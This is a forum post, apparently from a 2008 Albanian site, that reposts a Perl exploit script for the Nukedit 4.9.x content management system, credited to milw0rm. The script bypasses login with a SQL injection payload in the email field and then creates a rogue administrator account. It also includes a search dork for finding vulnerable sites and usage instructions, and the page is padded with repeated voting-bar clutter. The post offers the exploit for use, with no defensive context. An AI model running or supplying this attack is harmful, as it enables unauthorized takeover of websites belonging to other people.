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Nukedit 4.9.x Remote Create Admin Exploit Chatzl10
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Nukedit 4.9.x Remote Create Admin Exploit Vote_lcapNukedit 4.9.x Remote Create Admin Exploit Voting_barNukedit 4.9.x Remote Create Admin Exploit Vote_rcap 
Nukedit 4.9.x Remote Create Admin Exploit Vote_lcapNukedit 4.9.x Remote Create Admin Exploit Voting_barNukedit 4.9.x Remote Create Admin Exploit Vote_rcap 
Nukedit 4.9.x Remote Create Admin Exploit Vote_lcapNukedit 4.9.x Remote Create Admin Exploit Voting_barNukedit 4.9.x Remote Create Admin Exploit Vote_rcap 
Nukedit 4.9.x Remote Create Admin Exploit Vote_lcapNukedit 4.9.x Remote Create Admin Exploit Voting_barNukedit 4.9.x Remote Create Admin Exploit Vote_rcap 
Nukedit 4.9.x Remote Create Admin Exploit Vote_lcapNukedit 4.9.x Remote Create Admin Exploit Voting_barNukedit 4.9.x Remote Create Admin Exploit Vote_rcap 
Nukedit 4.9.x Remote Create Admin Exploit Vote_lcapNukedit 4.9.x Remote Create Admin Exploit Voting_barNukedit 4.9.x Remote Create Admin Exploit Vote_rcap 
Nukedit 4.9.x Remote Create Admin Exploit Vote_lcapNukedit 4.9.x Remote Create Admin Exploit Voting_barNukedit 4.9.x Remote Create Admin Exploit Vote_rcap 
Nukedit 4.9.x Remote Create Admin Exploit Vote_lcapNukedit 4.9.x Remote Create Admin Exploit Voting_barNukedit 4.9.x Remote Create Admin Exploit Vote_rcap 
Nukedit 4.9.x Remote Create Admin Exploit Vote_lcapNukedit 4.9.x Remote Create Admin Exploit Voting_barNukedit 4.9.x Remote Create Admin Exploit Vote_rcap 
Nukedit 4.9.x Remote Create Admin Exploit Vote_lcapNukedit 4.9.x Remote Create Admin Exploit Voting_barNukedit 4.9.x Remote Create Admin Exploit Vote_rcap 
Gashi Meda
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 Nukedit 4.9.x Remote Create Admin Exploit

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Numri i postimeve : 159
Join date : 12/06/2008
Age : 111
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MesazhTitulli: Nukedit 4.9.x Remote Create Admin Exploit   Nukedit 4.9.x Remote Create Admin Exploit Icon_minitimeThu Jun 12, 2008 8:28 pm

#!/usr/bin/perl############################################## ##############Title: Nukedit 4.9.x Create Admin Exploit ## ##Credit: r3dm0v3 ## http://r3dm0v3.persianblog.ir ## r3dm0v3[4t]yahoo[dot]com ## Tehran - Iran ## ##Download: http://www.nukedit.com/content/Download.asp ##Vulnerables: 4.9.x, prior versions maybe affected. ##Remote: Yes ##Dork: "Powered by Nukedit" ##Fix: Not Available ################################################## ##########use LWP::UserAgent;use HTTP::Cookies;$host = $ARGV[0];if (substr($host,length($host)-1,1) ne "/"){ $host.="/";}$usrmail = $ARGV[1];$passwd = $ARGV[2];$url = "http://".$host;$usrSQL= "' union select 1,1,'r3dm0v3',4,'ENCfc2aef9fe5f2c546429e2e1d9fd737 e6da5b1b94707518619576129a915d0c2c',6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20 from tblusers where 'x'='x";&Banner();if (@ARGV < 3) {&Usage();exit(1);}print "[~] Host: $host \n";print "[~] Email/Password: $usrmail/$passwd\n";print "[~] Logging in...\n";$xpl = LWP::UserAgent->new() || die;$cookie_jar = HTTP::Cookies->new();$xpl->cookie_jar( $cookie_jar );$res = $xpl->post($url.'utilities/login.asp',Content => ["redir" => "/nukedit/default.asp","email" => "$usrSQL","password" => "r3dm0v3","savepassword" => "false","submit" => "Login",],);if ($res->content =~ /Object Moved/){ print "[+] Logged in\n";}else{ print "[-] Can not login!\n"; exit();}print "[~] Creating Admin...\n";$res = $xpl->post($url.'utilities/useradmin.asp',Content => ["action" => "addDB","username" => "r3dm0v3","company" => "red move","url" => "http://r3dm0v3.persianblog.ir","address" => "a","county" => "b","zip" => "666","country" => "Iran","phone" => "66666666","fax" => "12345678","email" => "$usrmail","password" => "$passwd","groupid" => "1","submit1" => "Add User >>","IP" => "",],);if ($res->content =~ /Object Moved/){ print "[+] Admin added. Login info:\n". " email: $usrmail\n". " password: $passwd\n";}else{ print "[-] Exploit failed!\n"; print $res->content;}sub Banner{print "################################################# ###########\n". "# Nukedit 4.9.x Create Admin Exploit #\n". "# by r3dm0v3 #\n". "# r3dm0v3[4t]yahoo[.]com #\n". "# http://r3dm0v3.persianblog.ir #\n". "################################################# ###########\n";}sub Usage(){print "\n Usage: nukedit.pl \n";print " ex. : nukedit.pl site.com/nukedit/ myname\@somewhere.com 123456\n";}# milw0rm.com [2008-02-26]

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Nukedit 4.9.x Remote Create Admin Exploit
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